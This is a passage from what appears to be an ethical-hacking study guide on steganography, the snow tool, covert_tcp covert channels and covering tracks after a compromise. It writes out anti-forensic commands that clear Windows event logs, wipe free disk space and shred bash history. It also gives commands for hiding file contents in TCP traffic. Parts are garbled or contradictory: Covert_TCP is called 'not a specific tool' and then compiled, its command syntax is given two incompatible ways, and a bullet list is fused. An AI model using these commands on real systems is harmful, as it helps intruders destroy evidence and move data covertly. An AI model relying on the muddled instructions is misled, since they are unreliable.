• Hiding Honeytokens: Ethical hackers can use steganography to hide honeytokens within their systems. Honeytokens are fake files or applications that are designed to attract attackers. By monitoring honeytokens, ethical hackers can learn about the attacker’s tactics, techniques, and procedures (TTPs).
• Data Leakage Detection: Steganography can be used to detect data leakage. For example, organizations can monitor employee communications for embedded messages that may contain sensitive information.

Here are some specific examples of how ethical hackers use steganography:

• Hiding a message within an image: An ethical hacker could use a steganography tool to hide a message within a seemingly innocent image file. The message could be anything from a simple text message to a complex binary file.
• Embedding a password within an audio file: An ethical hacker could use a steganography tool to embed a password within an audio file. This password could be used to gain access to a target system or to decrypt other sensitive data.
• Concealing a malicious payload within a video file: An ethical hacker could use a steganography tool to conceal a malicious payload within a video file. This payload could be used to launch a cyber attack against a target system.

Steganography Tools

Whitespace steganography, Image Steganography (OpenStego) and Document Steganography (StegoStick) and xsteg are some of the windows GUI steganography tools.

Whitespace steganography is used to conceal messages in ASCII text by adding white spaces to the end of the lines. Because spaces and tabs are generally not visible in text viewers, the message is effectively hidden from casual observers. If the built-in encryption is used, the message cannot be read even if it is detected. To perform Whitespace steganography, various steganography tools such as snow are used. Snow is a program that conceals messages in text files by appending tabs and spaces to the end of lines, and that extracts hidden messages from files containing them. The user hides the data in the text file by appending sequences of up to seven spaces, interspersed with tabs.

snow tool: Download snow tool and create a text file (file.txt) with some random data. Next run below command:

snow.exe -C -m "Secret content" -p "password" file.txt file2.txt

Here, “secret content” is the secrect text that you want to hide. file.txt is the file that you already created. file2.txt will be a combination of the contents in file.txt + your “secret content”. However “secret content” will be hidden. “password” is the password for this secret content.

contents of file.txt is copied to file2.txt and “secret content” is added to this file2.txt. So, file2.txt contains all contents of file.txt and “secret content”.

To view the content, run: snow.exe -C -p "password" file2.txt

If you open file2.txt you will see the contents of file.txt by default. Hit ctrl + A, (select all). Now you will see empty spaces in the file. This is where your “secret content” is stored. If you remove these empty spaces, save the file and run above command to view the password, output will be empty as the secret content is removed from the file.

Steganalysis

Steganalysis is the art and science of detecting the presence of hidden information within a seemingly harmless carrier file, like an image, audio file, or video. This hidden information, known as a stego-object, can be anything from a simple message to complex data.

Here’s how it works:

1. Analyzing the file: Steganalysts look for subtle changes in the file, such as:

   • nusual patterns in the dataChanges in the file’s sizeStatistical anomalies

2. Using specialized tools: There are tools available that can help steganalysts detect hidden messages, such as:

   • Stegdetect: A popular tool for analyzing images
   • Steghide: A tool for hiding and detecting messages in images
   • OpenStego: An open-source platform for steganalysis research

3. Knowledge and experience: The best steganalysts are those who have a deep understanding of steganographic techniques and how they work.

Covert_TCP

Covert_TCP refers to a type of communication or networking that involves hiding or disguising TCP (Transmission Control Protocol) traffic to make it less conspicuous or harder to detect. This technique is often used in cybersecurity or network security contexts, especially in scenarios where there’s a need for stealthy communication or evasion of detection mechanisms.

“Covert_TCP” isn’t a specific tool or protocol; it’s a concept or approach used in networking and security to conceal TCP traffic. Techniques like encryption, tunneling, steganography, or traffic obfuscation can be employed to achieve covert communication over TCP.

Sending and Receiving Data:

1. Server Setup:

Compile the covert_tcp.c file to create the server executable. Run the server: ./covert_tcp -s <destination_IP> <destination_port> <output_file>

./covert_tcp -dest 192.168.10.2 -source 192.168.10.3 -source_port 8888 -dest_port 9999 -file /home/user/Desktop/Send/message.txt

2. Client Setup:

Compile the covert_tcp.c file to create the client executable. Run the client: ./covert_tcp -c <source_IP> <source_port> <input_file> ./covert_tcp -dest 192.168.10.3 -source 192.168.10.2 -source_port 9999 -dest_port 8888 -server -file /home/ubuntu/Desktop/Receive/receive.txt

Example (C):

1
2
3
4
5

/* Server */
./covert_tcp -s 192.168.1.100 8080 received_file.txt

/* Client */
./covert_tcp -c 192.168.1.101 3333 secret_data.txt

On the receiving end open wireshark and filter with 9999 port. You will see traffic on that particular port. Under Internet protocol/Identification you can see each letter in the message.txt file is sent.

Covering Tracks

Disable auditing (Windows Audit policy using auditpol tool), clearing logs (Windows Event viewer), clear command prompt history in linux, manipulating log files (selectively deleting logs), covering tracks on network/OS, Deleting files/hiding artifacts, Disabling windows functionality are some of the options in covering tracks. In latest windows OSes, remove most recently used, delete cookies, clear cache etc..

Various techniques used to clear the evidence of security compromise are as follow:

• Disable Auditing: Disable the auditing features of the target system
• Clearing Logs: Clears and deletes the system log entries corresponding to security compromise activities
• Manipulating Logs: Manipulate logs in such a way that an intruder will not be caught in illegal actions
• Covering Tracks on the Network: Use techniques such as reverse HTTP shells, reverse ICMP tunnels, DNS tunneling, and TCP parameters to cover tracks on the network.
• Covering Tracks on the OS: Use NTFS streams to hide and cover malicious files in the target system
• Deleting Files: Use command-line tools such as Cipher.exe to delete the data and prevent its future recovery
• Disabling Windows Functionality: Disable Windows functionality such as last access timestamp, Hibernation, virtual memory, and system restore points to cover tracks

Windows tools to clear logs:

wevtutil el displays list of event logs.

wevtutil cl LOGNAME clears events in particular log.

wevtutil cl system clears system logs.

cipher /w:C:\ reclaims available unused space after files are deleted. After a file or folder is deleted in windows, the actual file or folder is not deleted. The reference to that file or folder is deleted. But the actual content remains in the disk. With data recovery softwares anyone can recover those files. With cipher tool, if we use /w parameter it will reclaim all that unused space and no one can recover the deleted data thereafter.

You can also use other track-covering tools such as DBAN (https://dban.org), Privacy Eraser (https://www.cybertronsoft.com), Wipe (https://privacyroot.com), and BleachBit (https://www.bleachbit.org) to clear logs on the target machine.

Clear linux logs using bash shell:

export HISTSIZE=0

history -c

history -w clears history commands from the current terminal.

shred ~./bash_history

You can use all the above-mentioned commands in a single command by issuing shred ~/.bash_history && cat /dev/null > .bash_history && history -c && exit